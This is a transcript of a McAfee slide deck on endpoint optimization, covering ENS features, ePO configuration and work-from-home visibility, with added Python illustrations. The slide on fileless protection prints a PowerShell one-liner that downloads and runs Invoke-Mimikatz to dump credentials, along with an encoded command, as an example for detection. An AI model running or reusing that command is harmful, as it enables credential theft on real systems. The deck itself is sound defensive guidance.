McAfee CONFIDENTIAL McAfee's Top 10 endpoint optimization recommendations – Robert Lourenco, Regional presales specialist

Posted on 23-Oct-2020


TRANSCRIPT

  • McAfee CONFIDENTIAL

    McAfee's Top 10 endpoint optimization recommendations

    Robert Lourenco – Regional presales specialist

  • 2

    Please note

    While there are many variations of settings and configurations that will best suit different customers, this document is intended to assist customers with frequently seen missing or misconfigured protection controls. It assumes, at the very least, that OAS (on-access scan) is enabled, that tamper protection and UI passwords are enabled, and that ENS is deployed.

    This document is drawn from experience with health checks at many customers and therefore does not include every possible recommended setting. For a thorough investigation or check of your environment against best practice or recommendations, please engage McAfee Professional Services.

  • 3

    AGENDA

    • Addressing the work from home endpoint

    • ENS optimizations and configurations for better visibility or protection

    • ePO optimizations

    Many customers running McAfee ePO and Endpoint Security have not made a few optimizations that would lead to a more secure environment with more visibility.

  • 4

    [Slide graphic: "Our customers value drivers", with this presentation's topics called out against McAfee's value-driver themes; text recovered from the graphic, duplicates removed]

    Value drivers shown on the graphic:

    • Transition legacy datacenters to multi-cloud model for cost savings and agility
    • Support Legacy Infrastructure and Application Services as necessary
    • Support agile DevOps and redesign critical business applications for the cloud
    • Adopt Industrial IoT and leverage Data Analytics for more Business Insights
    • Transition legacy IT Infrastructure supporting OT to the multi-cloud enterprise Infrastructure
    • Risk and Resiliency; Transformation; Automation and efficacy
    • Enable flexibility in sharing and application use for maximum productivity
    • Transition Office Services and Common Business Applications to the cloud
    • Support a global, mobile workforce that enables productivity from the office to the home to the hotel
    • Increase Productivity and Innovation
    • Attract and Retain Talent
    • Increase sales and improve customer engagement

    Presentation topics called out on the graphic:

    • New ENS 10.7 features: Fileless detection & AMSI; Story Graph
    • Increased visibility and control: Work from home; New models (SaaS/IaaS/PaaS)
    • Rollback remediation
    • ePO automations
    • ENS/TIE/ATD integrations and automation

  • Transformation: Organizations are transforming with technology. Whether adopting the cloud, BYOD or IoT to transform the way they engage with customers, partners and/or employees, organizations bear risk as these technologies expand the attack surface. With McAfee, organizations can transform confidently, leveraging security solutions purpose-built with transformation in mind, including those that secure every segment of the cloud and heterogeneous device environments. And we transform the nature of security itself with security-as-a-service consumption models.

  • Optimization 1: Addressing the work from home conundrum: Endpoint visibility

  • 7

    Work from Home: Placing agent handlers in the DMZ

    Benefits:

    • Updated roaming users' policies and software

    • Get roaming users' threat and client events

    Positive results

    • No VPN requirement

    • WFH visibility

  • 8

    Baseline McAfee ePO Infrastructure with DMZ Agent handler

    [Slide diagram: internal network with the McAfee® ePO™ Server, SQL and the McAfee ePO Console; a DMZ hosting the Internet Agent Handler (DMZ Servers); roaming laptops running MA 5.x on the Internet. Ports labelled on the diagram:]

    • SQL: Port 1433 (SSL)
    • Agent Handler: Ports 443, 8443, 8444
    • Pull Software & Updates: TCP Ports 21/80 and 443
    • Laptops, Agent Port 443: Events upstream, Policies and Client Tasks down, Port 443
    • MA 5.x Pull Software & Updates: Port 443

    KEY POINTS

    ▪ Simple deployment

    ▪ Ease of management from a single console

    ▪ Ease of scalability

    ▪ Distributed definition updates

    ▪ Remote user support

  • Optimization 2 (TIE customers only): Addressing the work from home conundrum: Remote TIE reputation capabilities

  • 10

    Work from Home: Placing DXL brokers in the DMZ (TIE customers)

    Benefits:

    • Run agent wake up calls to roaming users

    • Apply DXL messages to roaming users

    • Provide enterprise reputation protection from Threat intelligence exchange to roaming users

    Positive results

    • No VPN requirement

    • WFH endpoint increased protection

  • 11

    Baseline McAfee® ePO™ Infrastructure with DMZ DXL broker

    [Slide diagram: internal network with McAfee® ATD, the McAfee® ePO™ Server, SQL, the McAfee® TIE Primary DXL Broker and the McAfee ePO Console; a DMZ hosting the Internet Agent Handler and a DXL Broker (DMZ Servers); roaming laptops running MA 5.x on the Internet. Ports labelled on the diagram:]

    • SQL: Port 1433 (SSL)
    • Agent Handler: Ports 443, 8443, 8444
    • DXL: Port 8883
    • MA: Port 8081; AH: 443
    • Pull Software & Updates: TCP Ports 21/80 and 443
    • Laptops: DXL Port 8883 + ICMP
    • Events upstream, Policies and Client Tasks down: Port 443
    • MA 5.x Pull Software & Updates: Port 443
    • DXL: Port 8883 + 443

    KEY POINTS

    ▪ Simple deployment

    ▪ Ease of management from a single console

    ▪ Ease of scalability

    ▪ Distributed definition updates

    ▪ Remote user support

  • Risk and Resiliency: Security is about risk management. To fulfill this purpose, security professionals must speak the language of the boardroom. Yesterday's security tools leave them blind to the risk, let alone able to communicate it. And, with regulations (like GDPR) upping the ante on the consequences of a breach, the stakes are getting higher. McAfee provides security solutions that offer visibility and control of data and assets across the attack surface, enabling organizations to meet compliance requirements, protect intellectual property and manage financial and reputational risk.

  • ENS 10.7

  • 14

    For customers who still have not upgraded to ENS 10.7:

    • Best performing ENS to date with all the additional features

    • Most stable ENS release to date

    • Multiple new enhancements

  • ENS | Detection Technology per Version

    Endpoint Security Capabilities Summary (● = available in that version)

    | Detection Technology | ENS 10.5.5 | ENS 10.5.5 | ENS 10.6.1 | ENS 10.7 |
    |---|---|---|---|---|
    | Threat Prevention | ● | ● | ● | ● |
    | Adaptive Threat Prevention |  | ● | ● | ● |
    | Signature & Heuristic Engine (convicting the majority of known malware) | ● | ● | ● | ● |
    | Global Threat Intelligence (cloud-based reputation for some known malware detections & up-to-the-minute updates) | ● | ● | ● | ● |
    | Attack Surface Reduction (using Exploit Prevention rules) | ● | ● | ● | ● |
    | Threat Intelligence Exchange (internal reputation source with unknown files automatically sent to ATD sandbox for analysis) |  | ● | ● | ● |
    | Process Containment (Dynamic Application Containment) |  | ● | ● | ● |
    | Static and Dynamic machine learning (using Real Protect) |  | ● | ● | ● |
    | File-based and fileless script attack signature detection (using Microsoft Anti-Malware Script Interface, or AMSI) |  |  | ● | ● |
    | Attack Behavior Blocking (using Adaptive Threat Prevention rules with Process Tree Knowledge) |  |  |  | ● |
    | File-based and fileless script attack machine learning detection (using Microsoft Anti-Malware Script Interface on Windows 10 and Windows 7 with PowerShell 5.0) |  |  |  | ● |
    | Roll-back of file and registry changes including encrypted files (using Enhanced Remediation) |  |  |  | ● |
    | Story Graph to illustrate the flow and activities associated with an attack (from launch to conviction) |  |  |  | ● |

  • Optimization 3: ENS AMSI

  • Have you enabled AMSI (Antimalware Scan Interface)?

    McAfee's AMSI integration protects against malicious scripts. VBScript and PowerShell scripts can be obfuscated; with AMSI support, ENS de-obfuscates the scripts and ensures that no malware is running and that fileless malware cannot affect the system.

    This setting may not be enabled by default, or it may be set to observe mode only, which creates events but does not block the malicious scripts from running.

    This setting can be found in the ENS ATP Options policy under Real Protect scanning:

  • [Slide diagram, slide 18: "With McAfee Fileless Threat Protection". An obfuscated PowerShell command is passed from CMD to the Scripting Engine and is unwrapped by McAfee with AMSI Support. The example shown on the slide:]

    IEX (New-Object System.Net.Webclient).DownloadString(‘https://git.com/***/Invoke-Mimikatz.ps1’) ; Invoke-Mimikatz -DumpCreds

    POWERSHELL.EXE -ENCODEDCOMMAND SQBGACGAJABQAFMAVGBLAFIAUWBJAAYG

  • Optimization 4: ENS Exploit Prevention – PowerShell signatures

  • Do you have PowerShell visibility or protection? McAfee ENS Exploit Prevention contains signatures for PowerShell monitoring and control.

    These signatures may not be enabled by default. At a minimum, for visibility for endpoint and SOC teams, enable the important ones for reporting if not for blocking. Visibility of encoded, hidden, execution-policy-bypass and many other PowerShell invocations is important for monitoring and detecting malware or malicious use of systems.

    This setting can be found in the ENS Exploit Prevention policy under Signatures.
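    As an added illustration (not part of the deck, and not McAfee's signature logic), the following Python sketch shows what "encoded, hidden, policy bypass" visibility amounts to when applied to PowerShell process command lines, including decoding an encoded command and handling one that is truncated; all sample command lines are constructed.

```python
import base64
import re

# Constructed sample process command lines (not from the original deck):
# a benign invocation, an encoded command, a hidden-window policy bypass,
# and an encoded command that was truncated and so cannot be decoded.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -File C:\\scripts\\inventory.ps1',
    'POWERSHELL.EXE -ENCODEDCOMMAND '
    + base64.b64encode('Write-Host hello'.encode('utf-16le')).decode(),
    'powershell -nop -w hidden -ep bypass -c "Get-Date"',
    'powershell.exe -enc SQBGACgAJABQAFMAVg',   # truncated base64
]

# The invocation styles the deck names as important for visibility.
# PowerShell accepts abbreviated parameter names, so common prefixes are listed.
ENCODED_RE = re.compile(r'(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)')
HIDDEN_RE = re.compile(r'(?i)\s-(?:w|win|windowstyle)\s+hidden\b')
BYPASS_RE = re.compile(r'(?i)\s-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)\b')


def decode_encoded_command(blob: str):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if malformed."""
    try:
        return base64.b64decode(blob, validate=True).decode('utf-16le')
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_command_line(cmdline: str) -> dict:
    """Return the visibility flags raised by one command line and any decoded script."""
    flags = []
    decoded = None
    match = ENCODED_RE.search(cmdline)
    if match:
        flags.append('encoded')
        decoded = decode_encoded_command(match.group(1))
        if decoded is None:
            flags.append('undecodable')      # still worth an event: cannot be inspected
    if HIDDEN_RE.search(cmdline):
        flags.append('hidden')
    if BYPASS_RE.search(cmdline):
        flags.append('policy-bypass')
    return {'cmdline': cmdline, 'flags': flags, 'decoded': decoded}


def triage(cmdlines):
    """Inspect every command line and keep only those that raised a flag."""
    return [r for r in (inspect_command_line(c) for c in cmdlines) if r['flags']]


if __name__ == '__main__':
    for result in triage(SAMPLE_COMMAND_LINES):
        print(result['flags'], result['decoded'] or result['cmdline'])
```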

  • Optimization 5: ENS Exploit Prevention – Fileless signatures

  • Are Fileless signatures enabled? McAfee ENS Exploit Prevention contains signatures for fileless threat monitoring and control.

    These signatures may not be enabled by default. At a minimum, for visibility for endpoint and SOC teams, enable the important ones for reporting if not for blocking. Visibility of fileless threats is important for monitoring and detecting malware or malicious use of systems.

    This setting can be found in the ENS Exploit Prevention policy under Signatures.

  • Optimization 6: ENS Exploit Prevention – Network Intrusion Prevention

  • Can you see port scanning and other network intrusions between endpoints that don't traverse network devices like an IPS or firewalls?

    This setting may not be enabled by default. ENS can detect network port scans and other network intrusions with its Network Intrusion Prevention capability.

    This setting can be found in the ENS Exploit Prevention policy under Network Intrusion Prevention.

  • Optimization 7: ENS – Ensure GTI is enabled

  • Is GTI enabled?

    • Make sure GTI is enabled. Ensure the systems can reach GTI through DNS. If the customer has a split-DNS architecture, some changes are needed for ENS TP to benefit from GTI:

    • https://kc.mcafee.com/corporate/index?page=content&id=KB53782

  • Automation & Efficacy: Security is awash in complexity. Sophisticated attacks are increasing, the vendor landscape is too complex, too many security products operate in isolation and there are too few employees to address the challenge. McAfee addresses the need by giving customers the best of both worlds: an open approach that offers competitive choice while simplifying operations; a mix of threat and artificial intelligence to maximize efficacy and minimize false positives; and solutions that team humans with machines to address both the sophistication and volume of threats.

  • Optimization 8: Effective client tasks

  • A client deployment task should be created at the top level of the system tree and deployed to all systems that require protection.

    A run-immediately task should be created so that, as soon as a system has a McAfee Agent deployed to it, it deploys ENS and the ENS components automatically. This reduces the time systems are unprotected.

    A daily task should also be set up so that any systems that did not complete the immediate task, for any reason, are caught by the daily task.

  • Product Deployment & Maintenance

    Situation

    • When managing large numbers of systems within a complex environment, some of these systems will inevitably not be running the desired products and versions of software

    Desired Outcome

    • To maximise the numbers of systems running the desired products and versions of software

  • Product Deployment & Maintenance

    The objective is to ensure Endpoint Security is installed and up to date from a product perspective, i.e.

    • An endpoint is running the latest versions of each Endpoint Security module

    • It is not concerned with content (Engine or DAT installed)

    Detailed Objectives

    1. Identify systems that are out of compliance

    2. Configure easy identification of non-compliant systems within System Tree

    3. Configure shorter reporting interval (ASCI) for non-compliant systems

    4. For systems that do not have any version installed run a deployment task

    5. For systems that have an out of date version run an update task

    6. Remove identification and shorter reporting interval for compliant systems

    Objectives & workflow

  • Use of tags with product deployment and maintenance

    • Tags

    • NO ENS: one or more ENS modules is not installed

    • BAD ENS: one or more ENS modules is out of date

    • Only one of the two, or neither, should be applied at any one time

    Note the use of simple short names; these can easily be viewed in the system tree.

    Remember that other tags may be present if automation is used extensively.

    • How to assign tags? Some considerations:

    • Tag assignment should be automatic (the admin should not need to assign tags)

    • Tag removal should be automatic too (i.e. a tag is only present while its condition is true)

    • ENS consists of multiple modules, so multiple version checks are required (e.g. Platform, Threat Prevention, Firewall, Web Control, Adaptive Threat Prevention)

    • The process should be as simple as possible to maintain (e.g. when a new version of ENS is released and the version numbers of all modules need to change)
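    As an added example (not the deck's content and not ePO's own tag-criteria engine), this Python sketch works through the tag rules above: NO ENS if any module is missing, BAD ENS if any module is behind the desired version, neither otherwise, with automatic removal of a stale tag and other tags left alone. The module names are the ones listed on the slide; the version numbers and systems are constructed.

```python
from typing import Dict, Optional, Set

# Desired version per ENS module for the current release. Module names are
# from the slide; the version strings are constructed for this example.
DESIRED_VERSIONS = {
    'Platform': '10.7.0.1234',
    'Threat Prevention': '10.7.0.1234',
    'Firewall': '10.7.0.1234',
    'Web Control': '10.7.0.1234',
    'Adaptive Threat Prevention': '10.7.0.1234',
}
COMPLIANCE_TAGS = {'NO ENS', 'BAD ENS'}


def version_tuple(version: str):
    """Turn '10.7.0.1234' into (10, 7, 0, 1234) so versions compare numerically,
    not as strings (where '10.7.0.999' would sort after '10.7.0.1234')."""
    return tuple(int(part) for part in version.split('.'))


def compliance_tag(installed: Dict[str, str],
                   desired: Dict[str, str] = DESIRED_VERSIONS) -> Optional[str]:
    """Return 'NO ENS', 'BAD ENS' or None for one system.

    installed maps module name -> installed version; missing modules are absent.
    A missing module wins over an out-of-date one, so at most one tag results.
    """
    if any(module not in installed for module in desired):
        return 'NO ENS'
    if any(version_tuple(installed[m]) < version_tuple(v) for m, v in desired.items()):
        return 'BAD ENS'
    return None


def apply_tags(current_tags: Set[str], installed: Dict[str, str]) -> Set[str]:
    """Recompute a system's tag set: drop stale compliance tags, add the current one.

    Tags from unrelated automation (anything outside COMPLIANCE_TAGS) are preserved.
    """
    tags = set(current_tags) - COMPLIANCE_TAGS      # automatic removal
    tag = compliance_tag(installed)
    if tag:
        tags.add(tag)                               # automatic assignment
    return tags


# Constructed inventory: one compliant, one out of date, one missing a module.
SYSTEMS = {
    'LAPTOP-01': dict(DESIRED_VERSIONS),
    'LAPTOP-02': {**DESIRED_VERSIONS, 'Threat Prevention': '10.6.1.0'},
    'LAPTOP-03': {m: v for m, v in DESIRED_VERSIONS.items() if m != 'Firewall'},
}

if __name__ == '__main__':
    for name, installed in SYSTEMS.items():
        print(name, sorted(apply_tags({'Finance', 'BAD ENS'}, installed)))
```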

  • Optimization 9: System tree sorting

  • System tree sorting

    Situation

    • When managing large numbers of systems within a complex environment, systems need to move automatically into the correct groups so that they have the right policies applied for the type of system they are or the location they are connecting from.

    Desired Outcome

    • To ensure systems are always placed in the correct group to get the correct policies.

  • System tree sorting - configuration

    First check the server settings

    • Under Configuration → Server Settings → System Tree Sorting: to have systems sort on each agent-to-server communication, ensure it is enabled.

    Check whether systems have sorting enabled in the system tree

    • You may need to add the System Tree Sorting column

  • System tree sorting - configuration

    Check whether sorting is enabled on Active Directory synchronization agent deployment

    • Under System Tree → Group Details → Synchronization Type → Push Agent

    Ensure sorting criteria are set up by IP or tag. Systems will move to the correct groups based on IP, tag, or a combination of the two.

    • Under System Tree → Group Details → Sorting Criteria
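    As an added example (not from the deck, and a simplified model of ePO's sorting criteria rather than its actual rules), this Python sketch sorts systems into groups by IP subnet, by tag, or by both. The group names, subnets, tags and systems are constructed; the fallback group name Lost&Found is ePO's holding group for systems that match no criteria.

```python
import ipaddress
from typing import Dict, List, Set

# Constructed sorting criteria, checked in order. A rule with only subnets
# sorts by IP, one with only tags sorts by tag, and one with both requires
# both to match, which is the "combination of the two" from the slide.
SORTING_RULES = [
    {'group': 'Servers/Datacenter', 'subnets': ['10.10.0.0/16'], 'tags': []},
    {'group': 'Workstations/HQ', 'subnets': ['10.20.0.0/16'], 'tags': ['Workstation']},
    {'group': 'Workstations/WFH', 'subnets': [], 'tags': ['Laptop']},
]
UNSORTED_GROUP = 'Lost&Found'   # ePO's holding group for systems that match nothing


def rule_matches(rule: dict, ip: str, tags: Set[str]) -> bool:
    """Evaluate one group's criteria against a system's IP address and tags."""
    if not rule['subnets'] and not rule['tags']:
        return False                                  # a group without criteria never sorts
    addr = ipaddress.ip_address(ip)
    ip_ok = not rule['subnets'] or any(addr in ipaddress.ip_network(s) for s in rule['subnets'])
    tag_ok = not rule['tags'] or bool(tags & set(rule['tags']))
    return ip_ok and tag_ok


def sort_system(ip: str, tags: Set[str], rules: List[dict] = SORTING_RULES) -> str:
    """Return the first group whose criteria the system satisfies, else Lost&Found."""
    for rule in rules:
        if rule_matches(rule, ip, tags):
            return rule['group']
    return UNSORTED_GROUP


def sort_all(systems: Dict[str, dict]) -> Dict[str, str]:
    """Sort an inventory of {name: {'ip': ..., 'tags': ...}} into groups."""
    return {name: sort_system(s['ip'], set(s['tags'])) for name, s in systems.items()}


# Constructed inventory exercising each sorting path.
SYSTEMS = {
    'SRV-DB-01': {'ip': '10.10.4.25', 'tags': set()},                  # IP only
    'WS-HQ-17': {'ip': '10.20.8.3', 'tags': {'Workstation'}},          # IP and tag
    'WS-HQ-18': {'ip': '10.20.8.4', 'tags': set()},                    # IP ok, tag missing
    'LT-0042': {'ip': '192.0.2.77', 'tags': {'Laptop', 'Finance'}},    # tag only, off-network
}

if __name__ == '__main__':
    for name, group in sort_all(SYSTEMS).items():
        print(f'{name:10} -> {group}')
```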

  • Optimization 10: ENS 10.7 – rollback

  • 38

    Rollback Remediation

    How it works: automatically returns systems to a healthy state

    Malware attempts to compromise an endpoint:

    • Filenames altered
    • Executables are called on to grant access to the system
    • Payload is delivered, system is compromised

    • System snapshot is established; records changes made to files, permission changes and other malicious actions
    • ENS detects threats through known methods, behavioral analysis or global threat intelligence
    • Rollback remediation is triggered by administrative policies
    • System changes are reversed and the system returns to a healthy state

    Users remain productive; administrators regain time otherwise spent on manual repair or reimaging

  • 39

    ENS 10.7 ATP – Enable enhanced remediation

    To enable rollback:

    • Under the ENS ATP policies → Options → Action Enforcement